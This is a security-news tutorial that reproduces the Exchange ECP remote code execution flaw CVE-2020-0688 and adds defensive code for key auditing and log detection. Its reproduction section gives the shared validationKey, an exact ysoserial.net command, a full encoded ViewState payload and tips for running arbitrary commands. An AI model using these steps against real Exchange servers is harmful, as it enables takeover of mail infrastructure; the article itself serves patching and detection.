
How to reproduce the Exchange remote code execution vulnerability CVE-2020-0688

2025-04-07 Update. From: SLTechnology News&Howtos, Network Security

Shulou (Shulou.com) 05/31 Report

This article shows how to reproduce the Exchange remote code execution vulnerability CVE-2020-0688. The content is fairly detailed; interested readers can refer to it, and I hope it is of help.

A Microsoft Exchange Server remote code execution vulnerability, CVE-2020-0688, has been disclosed publicly. The Ding Niu security team reproduced the vulnerability and analyzed its cause and exploitation, in the hope of helping enterprises understand the damage it can do and patch it promptly.

Affected versions

Microsoft Exchange Server 2010 Service Pack 3

Microsoft Exchange Server 2013

Microsoft Exchange Server 2016

Microsoft Exchange Server 2019

Vulnerability principle

The flaw stems from the Exchange Server installer failing to create a unique cryptographic key for the web application during installation.

Specifically, unlike a normal software installation that generates random keys each time, every Exchange Server installation ships with the same validationKey and decryptionKey in the web.config file. These keys protect ViewState: the server-side state that an ASP.NET web application stores on the client in serialized form and that the client sends back to the server in the __VIEWSTATE request parameter. The validationKey is used to compute the MAC that the server checks before it accepts a ViewState, so anyone who knows the key can sign a ViewState of their own choosing. Because ASP.NET deserializes ViewState on the server, an attacker who can forge the MAC can embed a deserialization gadget in it and run arbitrary .NET code within the Exchange Control Panel web application.

Once an attacker has obtained, by any means, the password of a user account that can log in to the Exchange Control Panel (ECP), they can execute arbitrary code on the target Exchange server and take control of it directly. Any mailbox user can log in to ECP, so no privileged account is needed.
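The point above is that the key is shared, not that ViewState is insecure in itself, so the first thing a defender wants is a way to tell whether a given web.config still carries the shared key. The following Python is an added example written for this page, not code from the article or from Microsoft. It parses a constructed web.config excerpt (the decryptionKey in it is a placeholder; the page gives only the validationKey default), reports whether the validationKey is the known shared value, and shows what a per-server key looks like. The supported fix for Exchange is the security update listed in the remediation section; the hardening function illustrates what unique keys look like rather than recommending hand-editing Exchange's web.config. The path of the ECP web.config is not given on the page; on a default install it sits under the Exchange FrontEnd\HttpProxy\ecp folder.

```python
import secrets
import xml.etree.ElementTree as ET

# The validationKey every unpatched Exchange install ships with (value from the article).
DEFAULT_VALIDATION_KEY = "CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"

# Constructed excerpt of an ECP web.config <system.web> section, written for this
# example. The decryptionKey value here is a placeholder, not Exchange's real default.
SAMPLE_WEB_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"
                decryptionKey="00112233445566778899AABBCCDDEEFF"
                validation="SHA1" decryption="AES" />
  </system.web>
</configuration>
"""


def audit_machine_key(web_config_xml: str) -> dict:
    """Report whether a web.config carries the shared Exchange validationKey.

    Returns a dict with:
      present                -- an explicit <machineKey> element exists
      default_validation_key -- its validationKey equals the known shared default
      validation             -- the MAC algorithm attribute ("SHA1" on unpatched installs)
    """
    root = ET.fromstring(web_config_xml)
    machine_key = root.find("./system.web/machineKey")
    if machine_key is None:
        # No explicit key: ASP.NET falls back to the machine-level setting, which is
        # auto-generated per application by default, so it is not the shared key.
        return {"present": False, "default_validation_key": False, "validation": None}
    validation_key = (machine_key.get("validationKey") or "").strip().upper()
    return {
        "present": True,
        "default_validation_key": validation_key == DEFAULT_VALIDATION_KEY,
        "validation": machine_key.get("validation"),
    }


def fresh_machine_key_attributes() -> dict:
    """Per-server random keys: 64 bytes for the HMAC key, 32 bytes for AES-256."""
    return {
        "validationKey": secrets.token_hex(64).upper(),
        "decryptionKey": secrets.token_hex(32).upper(),
        "validation": "HMACSHA256",
        "decryption": "AES",
    }


def harden_web_config(web_config_xml: str) -> str:
    """Return the config with its <machineKey> replaced by freshly generated keys."""
    root = ET.fromstring(web_config_xml)
    system_web = root.find("./system.web")
    if system_web is None:
        raise ValueError("no <system.web> section")
    machine_key = system_web.find("machineKey")
    if machine_key is None:
        machine_key = ET.SubElement(system_web, "machineKey")
    machine_key.attrib.clear()
    machine_key.attrib.update(fresh_machine_key_attributes())
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    print("before:", audit_machine_key(SAMPLE_WEB_CONFIG))
    print("after: ", audit_machine_key(harden_web_config(SAMPLE_WEB_CONFIG)))
```

Run it against the real file by reading it into `audit_machine_key`; a `default_validation_key` of True means any authenticated user can forge ViewState for that application. The check compares only the validationKey, because that is the value the page documents; the shared decryptionKey is not needed to sign a payload.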

Reproduction process

1. Required variables

Exploiting this vulnerability needs four parameters:

-- validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF (default on every install; the root cause of the vulnerability)

-- validationalg = SHA1 (default)

-- generator = B97B4E27 (the default for /ecp/default.aspx)

-- viewstateuserkey = value of the ASP.NET_SessionId cookie (must be collected manually; it differs for each login session)

Of the four, the first two are fixed defaults; viewstateuserkey and generator must be collected from an authenticated session. viewstateuserkey is the value of the ASP.NET_SessionId cookie, and generator is in the hidden form field __VIEWSTATEGENERATOR. Both are easy to read with the browser's developer tools.

2. Obtain the viewstateuserkey and generator values

Log in normally and open /ecp/default.aspx. In the Network tab of the F12 developer tools, refresh the page (or resend the request) and locate the original response for /ecp/default.aspx from the login.

Read the ASP.NET_SessionId cookie in the Headers tab:

Search the Response tab for __VIEWSTATEGENERATOR and note the field's value:

If the field is not there, don't panic: use the default value B97B4E27.

3. Generate the payload with a tool

Use ysoserial.net to generate the deserialization payload. Download: https://github.com/pwntester/ysoserial.net/

Payload generation command:

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "calc.exe" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="d673d1a4-1794-403e-ab96-e283ca880ef2" --isdebug --islegacy

4. Construct the attack URL

Once the payload has been generated, URL-encode it and build a URL of the form:

/ecp/default.aspx?__VIEWSTATEGENERATOR=[generator]&__VIEWSTATE=[URL-encoded payload]

Substitute the __VIEWSTATEGENERATOR value obtained earlier and the URL-encoded payload.

Example:

Https://192.168.1.248/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEyhAYAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuM**wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuR**ybWF0dGluZy5UZXh0R**ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVnc**1bmRCcnVzaAECAAAABgMAAACmBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljc**zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI%2BDQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IiIgT2JqZWN0VHlwZSA9ICJ7IHg6VHlwZSBEaWFnOlByb2Nlc3N9IiBNZXRob2ROYW1lID0gIlN0YXJ0IiA%2BDQogICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc%2BY2FsYy5leGU8L1N5c3RlbTpTdHJpbmc%2BDQogICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM%2BDQogICAgPC9PYmplY3REYXRhUHJvdmlkZXI%2BDQo8L1Jlc291cmNlRGljdGlvbmFyeT4Lp73ado0NJN2PSSnfOoN9h5H7xCU%3D

5. Request the URL: the payload executes

When the constructed URL is requested, the server returns an HTTP 500 error, but the attack has in fact succeeded: the gadget runs while the ViewState is being deserialized, and the error is raised only afterwards.

Log in to the server and check the process list: the calculator has been started.
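The 500 response and the shape of the request above also give a defender something to look for. Normal ECP postbacks send __VIEWSTATE in the POST body, so IIS logs "-" in cs-uri-query; the exploit puts __VIEWSTATE in the query string, which IIS logs verbatim, together with the authenticated cs-username and the client IP. The following Python is an added example written for this page, not code from the article: it parses a constructed IIS W3C log excerpt (no real server produced these lines) and lists every /ecp/default.aspx request that carries __VIEWSTATE in the query string. Field names follow IIS's #Fields header; the selection of columns and the exact log layout are assumptions about a typical configuration.

```python
import re

# Constructed IIS W3C log excerpt written for this example; no real server produced it.
# The #Fields line names the columns, exactly as IIS writes it at the top of each log.
# IIS replaces spaces inside a field (for example the User-Agent) with '+'.
SAMPLE_IIS_LOG = """#Software: Microsoft Internet Information Services 8.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2020-02-26 10:15:01 10.0.0.5 GET /ecp/default.aspx - 443 CORP\\alice 10.0.0.20 Mozilla/5.0 200 0 0 120
2020-02-26 10:15:02 10.0.0.5 POST /ecp/default.aspx - 443 CORP\\alice 10.0.0.20 Mozilla/5.0 200 0 0 95
2020-02-26 10:16:40 10.0.0.5 GET /ecp/default.aspx __VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEyAAEAAP%2F%2F%2BQ%3D%3D 443 CORP\\alice 192.168.1.50 python-requests/2.22.0 500 0 0 310
2020-02-26 10:16:41 10.0.0.5 GET /ecp/default.aspx __VIEWSTATE=%2FwEyAAEAAP%2F%2F%2BQ%3D%3D 443 CORP\\alice 192.168.1.50 python-requests/2.22.0 500 0 0 298
2020-02-26 10:17:00 10.0.0.5 GET /owa/ - 443 CORP\\bob 10.0.0.21 Mozilla/5.0 200 0 0 40
"""


def parse_iis_w3c(log_text: str):
    """Yield one dict per entry, keyed by the names in the most recent #Fields line."""
    fields = None
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split(" ")[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split(" ")
        if fields is None or len(values) != len(fields):
            continue  # malformed or unexpected line; skip rather than mis-assign columns
        yield dict(zip(fields, values))


def find_cve_2020_0688_attempts(log_text: str) -> list:
    """Entries for /ecp/default.aspx that carry __VIEWSTATE in the query string.

    A legitimate ECP postback sends __VIEWSTATE in the POST body, so IIS logs '-'
    in cs-uri-query. The exploit URL puts it in the query string, and that is what
    the log records. sc-status is kept because a successful hit returns 500.
    """
    hits = []
    for entry in parse_iis_w3c(log_text):
        stem = entry.get("cs-uri-stem", "")
        query = entry.get("cs-uri-query", "-")
        if not stem.lower().endswith("/ecp/default.aspx"):
            continue
        # Match the parameter name exactly, so __VIEWSTATEGENERATOR alone does not fire.
        if not re.search(r"(^|&)__VIEWSTATE=", query, re.IGNORECASE):
            continue
        hits.append({
            "time": f'{entry.get("date", "")} {entry.get("time", "")}',
            "user": entry.get("cs-username", "-"),
            "client": entry.get("c-ip", "-"),
            "status": int(entry.get("sc-status", "0")),
            "query_length": len(query),
        })
    return hits


if __name__ == "__main__":
    for hit in find_cve_2020_0688_attempts(SAMPLE_IIS_LOG):
        print(hit)
```

Every hit names the account whose credentials were used, since the exploit only works from an authenticated session; that account should be treated as compromised regardless of whether the request returned 500. Run the function over the logs of every server that hosts ECP, not only the one that received the request.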

Other notes

1. About versions

Some claims online say the vulnerability only affects certain minor versions within each major version. That is not the case; every version is affected. My test environment was Windows Server 2012 + Exchange 2013. Both 15.0.516.32 (December 3, 2012) and 15.0.1497.2 (June 18, 2019, i.e. CU23) were vulnerable and reproduced successfully; 2016 and 2019 were not tested but should behave the same.

2. __VIEWSTATEGENERATOR

This parameter did not appear in the initial version I tested (it is not really important, since the default value basically always works). The main reason is that the system patch KB2919355 had not been installed; after installing it, the __VIEWSTATEGENERATOR field appears.

3. Unable to create a file

Most write-ups only reproduce as far as starting the calculator and cannot create a file. Testing shows the problem lies in the -c parameter of ysoserial.exe. In demonstrations a file appears to be created directly with -c "echo OOOPS parameters! > c:/Vuln_Server.txt", which gives the impression that -c runs inside a cmd window; in fact -c is the program to be "run" (it is handed to Process.Start), so a bare echo with redirection is not allowed. Use -c "cmd /c echo test > C:\1.txt" instead; testing confirms the file is then created. As shown in the figure:

4. URL encoding

When encoding the generated payload, encode only the key special characters (the base64 characters +, / and =). If the whole payload is percent-encoded, the exploit will not work.

Remediation recommendations

1. Install the relevant patches promptly

Product, article and download:

-- Microsoft Exchange Server 2010 Service Pack 3: Update Rollup 30, security update 4536989

-- Microsoft Exchange Server 2013: Cumulative Update 23, security update 4536988

-- Microsoft Exchange Server 2016: cumulative update, security update

-- Microsoft Exchange Server 2019: Cumulative Update 4, security update 4536987

2. Restrict access to the Exchange Control Panel (ECP) component page

Because exploiting this vulnerability requires the Exchange Control Panel (ECP) component, blocking access to that component is also an effective emergency measure. Install the patch as soon as circumstances allow.

That covers how to reproduce the Exchange remote code execution vulnerability CVE-2020-0688. I hope the above is of some help and lets you learn something new. If you think the article is good, share it so more people can see it.
